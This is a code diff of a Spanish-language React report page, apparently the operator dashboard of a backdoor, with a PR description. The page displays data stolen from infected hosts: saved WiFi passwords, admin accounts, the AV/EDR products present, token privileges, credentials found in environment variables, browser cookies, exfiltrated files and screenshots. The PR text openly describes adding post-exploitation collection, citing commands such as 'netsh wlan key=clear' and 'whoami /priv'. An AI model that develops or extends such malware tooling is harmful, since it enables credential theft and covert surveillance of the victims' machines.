-              onClick={() => navigator.clipboard.writeText(value)}>
-              <Copy size={11} />
-            </button>
-          )}
+    <div style={{ display: "flex", flexWrap: "wrap", gap: 10 }}>
+      {list.map((b, i) => (
+        <div key={i} style={{
+          background: BLUE + "15", border: `1px solid ${BLUE}33`, borderRadius: 6,
+          padding: "10px 18px", display: "flex", alignItems: "center", gap: 10
+        }}>
+          <span style={{ fontSize: 18 }}>{icons[b] || "🌐"}</span>
+          <span style={{ color: BLUE, fontWeight: 600 }}>{b}</span>
+          <span style={{ color: YELLOW, fontSize: 11, background: YELLOW + "22", padding: "1px 6px", borderRadius: 4 }}>Cookies / Historial</span>
         </div>
       ))}
     </div>
   );
 }
 
-// ─── Componente principal ─────────────────────────────────────────────────────
-export default function ReportDetail() {
-  const { id }   = useParams();
-  const navigate = useNavigate();
-  const [report,   setReport]   = useState(null);
-  const [loading,  setLoading]  = useState(true);
-  const [error,    setError]    = useState(null);
-  const [showJson, setShowJson] = useState(false);
-
-  useEffect(() => { fetchReport(); }, [id]);
-
-  const fetchReport = async () => {
-    setLoading(true); setError(null);
-    try {
-      const res = await fetch(`http://localhost:5000/api/v1/reports/${id}`);
-      if (!res.ok) throw new Error(`Error ${res.status}`);
-      const data = await res.json();
-      setReport(data.data);
-    } catch (e) { setError(e.message); }
-    finally     { setLoading(false);  }
+// ── Apps instaladas ───────────────────────────────────────────────────────────
+function InstalledAppsSection({ apps }) {
+  const list = arr(apps);
+  if (!list.length) return <p style={{ color: MUTED, fontSize: 13 }}>No se detectaron aplicaciones de interés.</p>;
+  const categories = {
+    "Gestor de Contraseñas": ["keepass","1password","lastpass","bitwarden","dashlane","roboform"],
+    "SSH / FTP": ["putty","winscp","filezilla","mobaxterm","termius"],
+    "Virtualización": ["virtualbox","vmware"],
+    "VPN": ["openvpn","nordvpn","expressvpn","wireguard"],
+    "Acceso Remoto": ["anydesk","teamviewer","vnc","radmin"],
+    "DevTools": ["docker","kubectl","git","python","ruby","perl"],
+    "Seguridad": ["wireshark","nmap","burp","metasploit"],
   };
+  const getCategory = (name) => {
+    const lower = name.toLowerCase();
+    for (const [cat, kws] of Object.entries(categories)) {
+      if (kws.some(kw => lower.includes(kw))) return cat;
+    }
+    return "Otro";
+  };
+  const catColors = {
+    "Gestor de Contraseñas": RED, "SSH / FTP": BLUE, "Virtualización": PURPLE,
+    "VPN": GREEN, "Acceso Remoto": YELLOW, "DevTools": ORANGE, "Seguridad": RED,
+  };
+  return (
+    <div style={{ display: "flex", flexDirection: "column", gap: 8 }}>
+      {list.map((a, i) => {
+        const cat = getCategory(a.name);
+        const color = catColors[cat] || MUTED;
+        return (
+          <div key={i} style={{
+            background: BG, border: `1px solid ${BORDER}`, borderRadius: 6,
+            padding: "9px 14px", display: "flex", alignItems: "center", gap: 12
+          }}>
+            <Package size={13} color={color} />
+            <span style={{ color: "#e6edf3", fontWeight: 600, flex: 1 }}>{a.name}</span>
+            {a.version && <span style={{ color: MUTED, fontFamily: "monospace", fontSize: 12 }}>v{a.version}</span>}
+            <Badge label={cat} color={color} />
+          </div>
+        );
+      })}
+    </div>
+  );
+}
+
+// ── Procesos ──────────────────────────────────────────────────────────────────
+function ProcessTable({ processes }) {
+  const [sort, setSort] = useState("cpu");
+  const [dir, setDir] = useState(-1);
+  const list = arr(processes);
+  const toggle = (col) => { if (sort === col) setDir(d => -d); else { setSort(col); setDir(-1); } };
+  const sorted = [...list].sort((a, b) => (a[sort] > b[sort] ? 1 : -1) * dir);
+  const cols = [
+    { key: "pid", label: "PID" },
+    { key: "name", label: "Nombre" },
+    { key: "cpu", label: "CPU %", bar: true, max: 100 },
+    { key: "memory", label: "RAM %", bar: true, max: 100 },
+  ];
+  return (
+    <div style={{ overflowX: "auto" }}>
+      <table style={{ width: "100%", borderCollapse: "collapse", fontSize: 12 }}>
+        <thead>
+          <tr style={{ borderBottom: `1px solid ${BORDER}` }}>
+            {cols.map(c => (
+              <th key={c.key} onClick={() => toggle(c.key)} style={{
+                padding: "6px 10px", textAlign: "left", color: sort === c.key ? BLUE : MUTED,
+                fontWeight: 600, cursor: "pointer", whiteSpace: "nowrap",
+                fontSize: 11, textTransform: "uppercase"
+              }}>{c.label} {sort === c.key ? (dir === -1 ? "↓" : "↑") : ""}</th>
+            ))}
+          </tr>
+        </thead>
+        <tbody>
+          {sorted.slice(0, 100).map((p, i) => (
+            <tr key={i} style={{ borderBottom: `1px solid ${BORDER}44` }}>
+              <td style={{ padding: "5px 10px", color: MUTED, fontFamily: "monospace" }}>{p.pid}</td>
+              <td style={{ padding: "5px 10px", color: "#c9d1d9", fontFamily: "monospace" }}>{p.name}</td>
+              <td style={{ padding: "5px 10px", minWidth: 100 }}>
+                <div style={{ display: "flex", alignItems: "center", gap: 6 }}>
+                  <div style={{ flex: 1, background: BORDER, borderRadius: 2, height: 5, overflow: "hidden" }}>
+                    <div style={{ width: `${Math.min(p.cpu, 100)}%`, background: p.cpu > 50 ? RED : GREEN, height: "100%" }} />
+                  </div>
+                  <span style={{ color: p.cpu > 50 ? RED : "#c9d1d9", fontSize: 11, width: 36, textAlign: "right" }}>{p.cpu?.toFixed(1)}%</span>
+                </div>
+              </td>
+              <td style={{ padding: "5px 10px", minWidth: 100 }}>
+                <div style={{ display: "flex", alignItems: "center", gap: 6 }}>
+                  <div style={{ flex: 1, background: BORDER, borderRadius: 2, height: 5, overflow: "hidden" }}>
+                    <div style={{ width: `${Math.min(p.memory, 100)}%`, background: BLUE, height: "100%" }} />
+                  </div>
+                  <span style={{ color: "#c9d1d9", fontSize: 11, width: 36, textAlign: "right" }}>{p.memory?.toFixed(1)}%</span>
+                </div>
+              </td>
+            </tr>
+          ))}
+        </tbody>
+      </table>
+    </div>
+  );
+}
+
+// ── Conexiones ────────────────────────────────────────────────────────────────
+function ConnectionTable({ connections }) {
+  const list = arr(connections);
+  const statusColor = { ESTABLISHED: GREEN, LISTEN: BLUE, TIME_WAIT: YELLOW, CLOSE_WAIT: ORANGE };
+  const counts = list.reduce((acc, c) => { acc[c.status] = (acc[c.status] || 0) + 1; return acc; }, {});
+  return (
+    <>
+      <div style={{ display: "flex", gap: 12, marginBottom: 12, flexWrap: "wrap" }}>
+        {Object.entries(counts).map(([status, count]) => (
+          <div key={status} style={{ display: "flex", alignItems: "center", gap: 6 }}>
+            <div style={{ width: 8, height: 8, borderRadius: "50%", background: statusColor[status] || MUTED }} />
+            <span style={{ color: statusColor[status] || MUTED, fontSize: 12 }}>{count} {status}</span>
+          </div>
+        ))}
+      </div>
+      <div style={{ overflowX: "auto" }}>
+        <table style={{ width: "100%", borderCollapse: "collapse", fontSize: 12, fontFamily: "monospace" }}>
+          <thead>
+            <tr style={{ borderBottom: `1px solid ${BORDER}` }}>
+              {["Proto", "Local", "Remoto", "Estado"].map(h => (
+                <th key={h} style={{ padding: "5px 10px", textAlign: "left", color: MUTED, fontSize: 11, textTransform: "uppercase", fontFamily: "sans-serif" }}>{h}</th>
+              ))}
+            </tr>
+          </thead>
+          <tbody>
+            {list.map((c, i) => {
+              const localObj = typeof c.local === "string" ? c.local : JSON.stringify(c.local);
+              const remoteObj = typeof c.remote === "string" ? c.remote : JSON.stringify(c.remote);
+              return (
+                <tr key={i} style={{ borderBottom: `1px solid ${BORDER}44` }}>
+                  <td style={{ padding: "4px 10px", color: PURPLE, textTransform: "uppercase" }}>{c.protocol}</td>
+                  <td style={{ padding: "4px 10px", color: "#c9d1d9" }}>{localObj}</td>
+                  <td style={{ padding: "4px 10px", color: MUTED }}>{remoteObj}</td>
+                  <td style={{ padding: "4px 10px", color: statusColor[c.status] || MUTED }}>{c.status}</td>
+                </tr>
+              );
+            })}
+          </tbody>
+        </table>
+      </div>
+    </>
+  );
+}
+
+// ── Persistencia ──────────────────────────────────────────────────────────────
+function PersistenceSection({ items }) {
+  const list = arr(items);
+  if (!list.length) return <p style={{ color: GREEN, fontSize: 13 }}>✓ Sin mecanismos de persistencia detectados.</p>;
+  const typeColor = (s) => {
+    const sl = s.toLowerCase();
+    if (sl.includes("runkey") || sl.includes("run:")) return YELLOW;
+    if (sl.includes("startup")) return RED;
+    if (sl.includes("cron") || sl.includes("systemd")) return PURPLE;
+    if (sl.includes("autostart")) return ORANGE;
+    return MUTED;
+  };
+  return (
+    <div style={{ display: "flex", flexDirection: "column", gap: 6 }}>
+      {list.map((item, i) => {
+        const color = typeColor(String(item));
+        const text = typeof item === "string" ? item : JSON.stringify(item);
+        return (
+          <div key={i} style={{
+            background: color + "12", border: `1px solid ${color}44`,
+            borderLeft: `3px solid ${color}`, borderRadius: 4, padding: "8px 12px",
+            display: "flex", gap: 10, alignItems: "flex-start"
+          }}>
+            <AlertTriangle size={13} color={color} style={{ marginTop: 2, flexShrink: 0 }} />
+            <span style={{ color: "#e6edf3", fontFamily: "monospace", fontSize: 12, wordBreak: "break-all" }}>{text}</span>
+          </div>
+        );
+      })}
+    </div>
+  );
+}
+
+// ── Historial de comandos ────────────────────────────────────────────────────
+function CommandHistory({ commands }) {
+  const list = arr(commands).filter(c => String(c).trim());
+  if (!list.length) return <p style={{ color: MUTED, fontSize: 13 }}>Sin historial de comandos.</p>;
+  return (
+    <div style={{ background: "#010409", border: `1px solid ${BORDER}`, borderRadius: 6, padding: 16, fontFamily: "monospace", fontSize: 12, maxHeight: 320, overflowY: "auto" }}>
+      {list.map((cmd, i) => (
+        <div key={i} style={{ display: "flex", gap: 12, padding: "2px 0", color: "#c9d1d9" }}>
+          <span style={{ color: "#30363d", width: 32, textAlign: "right", userSelect: "none" }}>{i + 1}</span>
+          <span style={{ color: "#79c0ff" }}>$</span>
+          <span>{String(cmd)}</span>
+        </div>
+      ))}
+    </div>
+  );
+}
+
+// ── Archivos exfiltrados ──────────────────────────────────────────────────────
+function FileList({ files }) {
+  const list = arr(files);
+  if (!list.length) return <p style={{ color: MUTED, fontSize: 13 }}>Sin archivos.</p>;
+  return (
+    <div style={{ display: "flex", flexDirection: "column", gap: 4, maxHeight: 320, overflowY: "auto" }}>
+      {list.map((f, i) => (
+        <div key={i} style={{ background: BG, border: `1px solid ${BORDER}`, borderRadius: 4, padding: "7px 12px" }}>
+          <div style={{ color: BLUE, fontFamily: "monospace", fontSize: 12 }}>{f.path}</div>
+          {f.sha256 && <div style={{ color: MUTED, fontFamily: "monospace", fontSize: 11, marginTop: 2 }}>SHA256: {f.sha256}</div>}
+        </div>
+      ))}
+    </div>
+  );
+}
+
+// ── Screenshot ────────────────────────────────────────────────────────────────
+function ScreenshotSection({ screenshot }) {
+  const [fullscreen, setFullscreen] = useState(false);
+  if (!screenshot) return <p style={{ color: MUTED, fontSize: 13 }}>Sin captura de pantalla.</p>;
+  const src = screenshot.path || (typeof screenshot === "string" ? screenshot : null);
+  if (!src) return <p style={{ color: MUTED, fontSize: 13 }}>Sin captura de pantalla.</p>;
+  return (
+    <>
+      <div style={{ position: "relative", display: "inline-block", cursor: "pointer" }} onClick={() => setFullscreen(true)}>
+        <img src={`/${src}`} alt="screenshot" style={{ maxWidth: "100%", borderRadius: 6, border: `1px solid ${BORDER}` }} />
+        <div style={{
+          position: "absolute", inset: 0, background: "rgba(0,0,0,.5)",
+          opacity: 0, transition: ".2s", borderRadius: 6, display: "flex", alignItems: "center", justifyContent: "center",
+        }}
+          onMouseEnter={e => e.currentTarget.style.opacity = 1}
+          onMouseLeave={e => e.currentTarget.style.opacity = 0}>
+          <Maximize2 color="#fff" size={28} />
+        </div>
+      </div>
+      {fullscreen && (
+        <div onClick={() => setFullscreen(false)} style={{
+          position: "fixed", inset: 0, background: "rgba(0,0,0,.9)", zIndex: 9999,
+          display: "flex", alignItems: "center", justifyContent: "center",
+        }}>
+          <img src={`/${src}`} alt="screenshot" style={{ maxWidth: "95vw", maxHeight: "95vh", borderRadius: 8 }} />
+          <button onClick={() => setFullscreen(false)} style={{
+            position: "absolute", top: 20, right: 20, background: "none", border: "none", color: "#fff", cursor: "pointer"
+          }}><X size={28} /></button>
+        </div>
+      )}
+    </>
+  );
+}
+
+// ── Blockchain ────────────────────────────────────────────────────────────────
+function BlockchainInfo({ sequence, hash, prevHash }) {
+  return (
+    <div style={{ display: "flex", flexDirection: "column", gap: 10 }}>
+      <div style={{ display: "flex", alignItems: "center", gap: 12 }}>
+        <Hash size={14} color={PURPLE} />
+        <span style={{ color: MUTED, fontSize: 12 }}>Secuencia</span>
+        <span style={{ color: PURPLE, fontWeight: 700, fontFamily: "monospace" }}>#{sequence}</span>
+      </div>
+      {[["Hash bloque", hash, GREEN], ["Hash anterior", prevHash, MUTED]].map(([label, val, color]) => (
+        <div key={label} style={{ background: BG, border: `1px solid ${BORDER}`, borderRadius: 6, padding: "10px 14px" }}>
+          <div style={{ color: MUTED, fontSize: 11, marginBottom: 4 }}>{label}</div>
+          <div style={{ display: "flex", alignItems: "center", gap: 8 }}>
+            <span style={{ color, fontFamily: "monospace", fontSize: 12, wordBreak: "break-all" }}>{val || "—"}</span>
+            {val && <CopyButton value={val} />}
+          </div>
+        </div>
+      ))}
+    </div>
+  );
+}
+
+// ── Main ──────────────────────────────────────────────────────────────────────
+export default function ReportDetails() {
+  const { id } = useParams();
+  const navigate = useNavigate();
+  const [report, setReport] = useState(null);
+  const [loading, setLoading] = useState(true);
+  const [rawOpen, setRawOpen] = useState(false);
+
+  useEffect(() => {
+    fetch(`/api/audit/${id}`)
+      .then(r => r.json())
+      .then(d => { setReport(d); setLoading(false); })
+      .catch(() => setLoading(false));
+  }, [id]);
 
   if (loading) return (
-    <div className="flex items-center justify-center h-full" style={{ background: BG }}>
-      <div className="flex items-center gap-3 font-mono text-sm" style={{ color: "#6e7681" }}>
-        <Database size={16} className="animate-pulse" style={{ color: "#58a6ff" }} />
-        Cargando reporte...
-      </div>
+    <div style={{ background: BG, minHeight: "100vh", display: "flex", alignItems: "center", justifyContent: "center", color: MUTED }}>
+      Cargando reporte...
     </div>
   );
-
-  if (error) return (
-    <div className="flex flex-col items-center justify-center h-full gap-4" style={{ background: BG }}>
-      <AlertTriangle size={32} style={{ color: "#f85149" }} />
-      <p className="text-sm" style={{ color: "#ffa198" }}>{error}</p>
-      <button onClick={() => navigate(-1)}
-        className="px-4 py-2 rounded-lg text-sm"
-        style={{ background: "#21262d", color: "#8b949e", border: `1px solid ${BORDER}` }}>
-        Volver
-      </button>
-    </div>
-  );
-
   if (!report) return (
-    <div className="flex items-center justify-center h-full" style={{ background: BG }}>
-      <EmptyState msg="Reporte no encontrado" icon={FileText} />
+    <div style={{ background: BG, minHeight: "100vh", display: "flex", alignItems: "center", justifyContent: "center", color: RED }}>
+      Reporte no encontrado.
     </div>
   );
 
-  const r     = report;
-  const cmds  = r.commands_executed || r.commandsrun || [];
-  const files = r.files_exfiltrated || r.filesaccessed || [];
-
-  const extConns = (r.connections || []).filter(c => {
-    if (c.status !== "ESTABLISHED") return false;
-    return !isPrivateIP(extractIP(c.remote));
-  });
-
-  const suspProcs = (r.processes || []).filter(p =>
-    SUSPICIOUS_PROC.has((p.name || "").toLowerCase())
-  );
-
-  const downloadJson = () => {
-    const a = document.createElement("a");
-    a.href = "data:application/json;charset=utf-8," + encodeURIComponent(JSON.stringify(r, null, 2));
-    a.download = `report_${r.hostname}_${id}.json`;
-    a.click();
-  };
+  const r = report;
 
   return (
-    <div className="min-h-full" style={{ background: BG }}>
-
-      {/* ── Header sticky ── */}
-      <div className="sticky top-0 z-10 px-6 py-3 border-b"
-        style={{ background: `${BG}f0`, borderColor: BORDER, backdropFilter: "blur(8px)" }}>
-        <div className="max-w-6xl mx-auto flex items-center justify-between">
-          <div className="flex items-center gap-3">
-            <button onClick={() => navigate(-1)}
-              className="p-1.5 rounded-lg hover:bg-white/5 transition-colors"
-              style={{ color: "#6e7681" }}>
-              <ArrowLeft size={16} />
-            </button>
-            <div>
-              <div className="flex items-center gap-2 flex-wrap">
-                <h1 className="text-sm font-bold" style={{ color: "#e6edf3" }}>{r.hostname}</h1>
-                {r.elevated && (
-                  <span className="text-xs font-semibold px-2 py-0.5 rounded-full"
-                    style={{ background: "rgba(248,81,73,0.15)", color: "#f85149", border: "1px solid rgba(248,81,73,0.3)" }}>
-                    ADMIN
-                  </span>
-                )}
-                {r.anti_debug && (
-                  <span className="text-xs font-semibold px-2 py-0.5 rounded-full"
-                    style={{ background: "rgba(210,153,34,0.15)", color: "#d29922", border: "1px solid rgba(210,153,34,0.3)" }}>
-                    ANTI-DEBUG
-                  </span>
-                )}
-                {extConns.length > 0 && (
-                  <span className="text-xs font-semibold px-2 py-0.5 rounded-full"
-                    style={{ background: "rgba(248,81,73,0.1)", color: "#ffa198", border: "1px solid rgba(248,81,73,0.25)" }}>
-                    {extConns.length} EXT C2
-                  </span>
-                )}
-              </div>
-              <p className="text-xs font-mono" style={{ color: "#6e7681" }}>
-                {r.os} {r.arch} · {r.user} · {formatDate(r.last_seen || r.lastseen)}
-              </p>
-            </div>
-          </div>
-
-          <div className="flex items-center gap-2">
-            <button onClick={() => setShowJson(v => !v)}
-              className="flex items-center gap-1.5 px-3 py-1.5 rounded-lg text-xs font-medium"
-              style={{ background: "#21262d", color: "#8b949e", border: `1px solid ${BORDER}` }}>
-              {showJson ? <EyeOff size={11} /> : <Eye size={11} />} Raw JSON
-            </button>
-            <button onClick={downloadJson}
-              className="flex items-center gap-1.5 px-3 py-1.5 rounded-lg text-xs font-medium"
-              style={{ background: "#238636", color: "#ffffff" }}>
-              <Download size={11} /> JSON
-            </button>
-          </div>
-        </div>
+    <div style={{ background: BG, minHeight: "100vh", color: "#e6edf3", fontFamily: "'Segoe UI', sans-serif" }}>
+      {/* Header sticky */}
+      <div style={{
+        position: "sticky", top: 0, zIndex: 100,
+        background: CARD + "ee", backdropFilter: "blur(12px)",
+        borderBottom: `1px solid ${BORDER}`, padding: "12px 24px",
+        display: "flex", alignItems: "center", gap: 12
+      }}>
+        <button onClick={() => navigate(-1)} style={{ background: "none", border: "none", color: MUTED, cursor: "pointer", display: "flex" }}>
+          <ArrowLeft size={18} />
+        </button>
+        <Fingerprint size={16} color={BLUE} />
+        <span style={{ color: "#e6edf3", fontWeight: 700, fontFamily: "monospace" }}>{r.hostname || r.agent_id}</span>
+        {r.elevated && <Badge label="ADMIN" color={RED} />}
+        {r.anti_debug && <Badge label="ANTI-DEBUG" color={YELLOW} />}
+        {r.domain_name && <Badge label={"AD: " + r.domain_name} color={PURPLE} />}
+        <span style={{ color: MUTED, fontSize: 12, marginLeft: "auto" }}>{r.os} · {r.arch}</span>
       </div>
 
-      <div className="max-w-6xl mx-auto px-6 py-6 space-y-5">
+      <div style={{ maxWidth: 1100, margin: "0 auto", padding: "24px 20px" }}>
+        {/* Stats overview */}
+        <div style={{ display: "flex", gap: 12, flexWrap: "wrap", marginBottom: 20 }}>
+          <StatCard label="Usuario" value={r.user} color={r.elevated ? RED : "#e6edf3"} sub={r.elevated ? "Privilegiado" : "Usuario estándar"} />
+          <StatCard label="SO / Arch" value={r.arch} color={BLUE} sub={r.os} />
+          <StatCard label="Procesos" value={arr(r.processes).length} color={GREEN} />
+          <StatCard label="Conexiones" value={arr(r.connections).length} color={BLUE} />
+          <StatCard label="Usuarios locales" value={arr(r.local_users).length} color={arr(r.local_users).some(u => u.is_admin) ? RED : GREEN}
+            sub={arr(r.local_users).filter(u => u.is_admin).length + " admins"} />
+          <StatCard label="WiFi guardadas" value={arr(r.wifi_networks).length} color={GREEN}
+            sub={arr(r.wifi_networks).filter(n => n.password).length + " con contraseña"} />
+        </div>
 
-        {/* ── JSON raw ── */}
-        {showJson && (
-          <div className="rounded-xl border overflow-hidden" style={{ borderColor: BORDER }}>
-            <div className="flex items-center justify-between px-4 py-2"
-              style={{ background: CARD2, borderBottom: `1px solid ${BORDER}` }}>
-              <div className="flex gap-1.5">
-                {["#ef4444","#eab308","#22c55e"].map(c => (
-                  <div key={c} className="w-2.5 h-2.5 rounded-full" style={{ background: c, opacity: 0.6 }} />
-                ))}
-              </div>
-              <span className="text-xs font-mono" style={{ color: "#6e7681" }}>report.json</span>
-              <button onClick={() => navigator.clipboard.writeText(JSON.stringify(r, null, 2))}
-                style={{ color: "#484f58" }} className="hover:text-blue-400 transition-colors">
-                <Copy size={11} />
-              </button>
+        {/* Red */}
+        <div style={{ display: "grid", gridTemplateColumns: "1fr 1fr", gap: 12, marginBottom: 12 }}>
+          <div style={{ background: CARD, border: `1px solid ${BORDER}`, borderRadius: 8, padding: 16 }}>
+            <div style={{ color: MUTED, fontSize: 11, marginBottom: 8, textTransform: "uppercase", letterSpacing: 1 }}>IPs ({arr(r.ips).length})</div>
+            <div style={{ display: "flex", flexWrap: "wrap", gap: 6 }}>
+              {arr(r.ips).map((ip, i) => <Chip key={i} label={ip} color={BLUE} />)}
             </div>
-            <pre className="p-4 overflow-auto max-h-80 text-xs font-mono"
-              style={{ background: "#0d1117", color: "#3fb950" }}>
-              {JSON.stringify(r, null, 2)}
-            </pre>
           </div>
+          <div style={{ background: CARD, border: `1px solid ${BORDER}`, borderRadius: 8, padding: 16 }}>
+            <div style={{ color: MUTED, fontSize: 11, marginBottom: 8, textTransform: "uppercase", letterSpacing: 1 }}>Red</div>
+            <div style={{ fontSize: 13 }}>
+              <div style={{ display: "flex", gap: 8, marginBottom: 4 }}>
+                <span style={{ color: MUTED }}>Gateway:</span>
+                <span style={{ color: "#e6edf3", fontFamily: "monospace" }}>{safe(r.gateway)}</span>
+              </div>
+              <div style={{ display: "flex", gap: 8 }}>
+                <span style={{ color: MUTED }}>DNS:</span>
+                <span style={{ color: "#e6edf3", fontFamily: "monospace" }}>{arr(r.dns).join(", ") || "—"}</span>
+              </div>
+            </div>
+          </div>
+        </div>
+
+        {/* Screenshot */}
+        {r.screenshot && (
+          <Section icon={Monitor} title="Captura de Pantalla" color={PURPLE} defaultOpen>
+            <ScreenshotSection screenshot={r.screenshot} />
+          </Section>
         )}
 
-        {/* ── Threat Intelligence ── */}
-        <ThreatSummary report={r} />
-
-        {/* ── Stats overview ── */}
-        <div className="grid grid-cols-3 sm:grid-cols-6 gap-3">
-          <StatBadge label="Usuario"    value={r.user?.split("\\").pop() || "N/A"} sub={r.user} color={r.elevated ? "#f85149" : "#e6edf3"} />
-          <StatBadge label="Arq."       value={r.arch || "—"} />
-          <StatBadge label="Procesos"   value={r.processes?.length ?? 0}   color={suspProcs.length > 0 ? "#d29922" : "#e6edf3"} sub={suspProcs.length > 0 ? `⚠ ${suspProcs.length} sospechosos` : undefined} />
-          <StatBadge label="Conexiones" value={r.connections?.length ?? 0} color={extConns.length > 0  ? "#f85149" : "#e6edf3"} sub={extConns.length > 0  ? `⚠ ${extConns.length} externas`    : undefined} />
-          <StatBadge label="Comandos"   value={cmds.length}   color={cmds.length   > 0 ? "#bc8cff" : "#6e7681"} />
-          <StatBadge label="Archivos"   value={files.length}  color={files.length  > 0 ? "#ffa198" : "#6e7681"} />
-        </div>
-
-        {/* ── Red: IPs, DNS, Gateway ── */}
-        <div className="grid grid-cols-1 md:grid-cols-3 gap-4">
-          <div className="rounded-xl border overflow-hidden" style={{ background: CARD, borderColor: BORDER }}>
-            <div className="flex items-center gap-2 px-5 py-3" style={{ borderBottom: `1px solid ${BORDER}` }}>
-              <Globe size={13} style={{ color: "#58a6ff" }} />
-              <span className="text-xs font-semibold uppercase tracking-widest" style={{ color: "#58a6ff" }}>
-                IPs ({r.ips?.length ?? 0})
-              </span>
-            </div>
-            <ChipList items={r.ips} color="#58a6ff" />
-          </div>
-
-          <div className="rounded-xl border overflow-hidden" style={{ background: CARD, borderColor: BORDER }}>
-            <div className="flex items-center gap-2 px-5 py-3" style={{ borderBottom: `1px solid ${BORDER}` }}>
-              <Server size={13} style={{ color: "#3fb950" }} />
-              <span className="text-xs font-semibold uppercase tracking-widest" style={{ color: "#3fb950" }}>
-                DNS ({r.dns?.length ?? 0})
-              </span>
-            </div>
-            <ChipList items={r.dns} color="#3fb950" />
-          </div>
-
-          <div className="rounded-xl border p-4 space-y-3" style={{ background: CARD, borderColor: BORDER }}>
-            {[
-              { icon: Network,  label: "Gateway",    value: r.gateway || "—",                          color: "#d29922" },
-              { icon: Clock,    label: "First seen",  value: formatDate(r.firstseen || r.first_seen),  color: "#6e7681" },
-              { icon: Activity, label: "Last seen",   value: formatDate(r.last_seen  || r.lastseen),   color: "#6e7681" },
-            ].map(({ icon: Icon, label, value, color }) => (
-              <div key={label} className="flex items-start gap-2 text-xs">
-                <Icon size={12} className="mt-0.5 shrink-0" style={{ color }} />
-                <div>
-                  <p style={{ color: "#484f58" }}>{label}</p>
-                  <p className="font-mono" style={{ color: "#e6edf3" }}>{value}</p>
-                </div>
-              </div>
-            ))}
-          </div>
-        </div>
-
-        {/* ── Secciones expandibles ── */}
-        <Section icon={Camera}    label="Captura de Pantalla"        color="#bc8cff">
-          <ScreenshotSection agentId={r.agent_id} hostname={r.hostname} lastSeen={r.last_seen} />
+        {/* WiFi */}
+        <Section icon={Wifi} title="Redes WiFi con Contraseña" color={GREEN} count={arr(r.wifi_networks).filter(n=>n.password).length} defaultOpen={arr(r.wifi_networks).length > 0}>
+          <WiFiSection networks={r.wifi_networks} />
         </Section>
 
-        <Section icon={Cpu}    label="Procesos Activos"           color={suspProcs.length > 0 ? "#d29922" : "#58a6ff"}
-          count={r.processes?.length}
-          badge={suspProcs.length > 0 ? `⚠ ${suspProcs.length} sospechosos` : undefined}
-          defaultOpen={suspProcs.length > 0}>
+        {/* Usuarios */}
+        <Section icon={Users} title="Usuarios Locales" color={RED} count={arr(r.local_users).length} defaultOpen={arr(r.local_users).some(u => u.is_admin)}>
+          <LocalUsersSection users={r.local_users} />
+        </Section>
+
+        {/* AV */}
+        <Section icon={Shield} title="Productos de Seguridad (AV / EDR)" color={GREEN} count={arr(r.security_products).length}>
+          <SecuritySection products={r.security_products} />
+        </Section>
+
+        {/* Privilegios */}
+        <Section icon={Key} title="Privilegios Habilitados" color={YELLOW} count={arr(r.token_privileges).length}>
+          <PrivilegesSection privileges={r.token_privileges} />
+        </Section>
+
+        {/* Env Creds */}
+        <Section icon={Lock} title="Credenciales en Variables de Entorno" color={YELLOW} count={arr(r.env_credentials).length}>
+          <EnvCredsSection creds={r.env_credentials} />
+        </Section>
+
+        {/* Browsers */}
+        <Section icon={Globe} title="Navegadores Instalados" color={BLUE} count={arr(r.browser_profiles).length}>
+          <BrowserSection browsers={r.browser_profiles} />
+        </Section>
+
+        {/* Apps */}
+        <Section icon={Package} title="Aplicaciones Relevantes" color={PURPLE} count={arr(r.installed_apps).length}>
+          <InstalledAppsSection apps={r.installed_apps} />
+        </Section>
+
+        {/* Persistencia */}
+        <Section icon={AlertTriangle} title="Mecanismos de Persistencia" color={RED} count={arr(r.persistence).length}>
+          <PersistenceSection items={r.persistence} />
+        </Section>
+
+        {/* Procesos */}
+        <Section icon={Cpu} title="Procesos Activos" color={BLUE} count={arr(r.processes).length}>
           <ProcessTable processes={r.processes} />
         </Section>
 
-        <Section icon={Network}   label="Conexiones de Red"          color={extConns.length > 0 ? "#f85149" : "#3fb950"}
-          count={r.connections?.length}
-          badge={extConns.length > 0 ? `⚠ ${extConns.length} externas` : undefined}
-          defaultOpen={extConns.length > 0}>
+        {/* Conexiones */}
+        <Section icon={Network} title="Conexiones de Red" color={GREEN} count={arr(r.connections).length} defaultOpen>
           <ConnectionTable connections={r.connections} />
         </Section>
 
-        <Section icon={Shield}    label="Mecanismos de Persistencia" color="#d29922"
-          count={r.persistence?.length}
-          defaultOpen={(r.persistence?.length || 0) > 0}>
-          <PersistenceList items={r.persistence} />
+        {/* Comandos */}
+        <Section icon={Terminal} title="Historial de Comandos (PowerShell / Bash)" color={PURPLE} count={arr(r.commands_executed).length}>
+          <CommandHistory commands={r.commands_executed} />
         </Section>
 
-        <Section icon={Terminal}  label="Historial de Comandos"      color="#bc8cff"
-          count={cmds.length}
-          defaultOpen={cmds.length > 0}>
-          <CommandHistory commands={cmds} />
+        {/* Archivos */}
+        <Section icon={FolderOpen} title="Archivos Exfiltrados" color={ORANGE} count={arr(r.files_exfiltrated).length}>
+          <FileList files={r.files_exfiltrated} />
         </Section>
 
-        <Section icon={HardDrive} label="Archivos Sensibles"         color="#f85149"
-          count={files.length}
-          defaultOpen={files.length > 0}>
-          <FileList files={files} />
+        {/* Blockchain */}
+        <Section icon={Hash} title="Integridad del Registro (Blockchain)" color={PURPLE} defaultOpen>
+          <BlockchainInfo sequence={r.sequence} hash={r.hash} prevHash={r.prev_hash} />
         </Section>
 
-        {r.hash && (
-          <Section icon={Hash} label="Integridad del Registro" color="#3fb950" defaultOpen>
-            <BlockchainInfo report={r} />
-          </Section>
-        )}
+        {/* Raw JSON */}
+        <div style={{ marginTop: 8 }}>
+          <button onClick={() => setRawOpen(!rawOpen)} style={{
+            background: "none", border: `1px solid ${BORDER}`, color: MUTED,
+            padding: "6px 14px", borderRadius: 6, cursor: "pointer", fontSize: 12
+          }}>
+            {rawOpen ? "Ocultar" : "Ver"} JSON raw
+          </button>
+          {rawOpen && (
+            <pre style={{
+              background: "#010409", border: `1px solid ${BORDER}`, borderRadius: 8,
+              padding: 16, marginTop: 8, fontSize: 11, overflowX: "auto",
+              color: "#8b949e", maxHeight: 400, overflowY: "auto"
+            }}>
+              {JSON.stringify(r, null, 2)}
+            </pre>
+          )}
+        </div>
       </div>
     </div>
   );


### PR DESCRIPTION
Backdoor ahora recolecta datos post-exploitation de alto valor:
- WiFi: SSIDs y contraseñas guardadas (netsh wlan key=clear)
- Usuarios locales con flag de administrador (net user / /etc/passwd)
- Productos AV/EDR detectados via WMI SecurityCenter2 o procesos conocidos (Defender, CrowdStrike, SentinelOne, Carbon Black, etc.)
- Privilegios habilitados del token actual (whoami /priv)
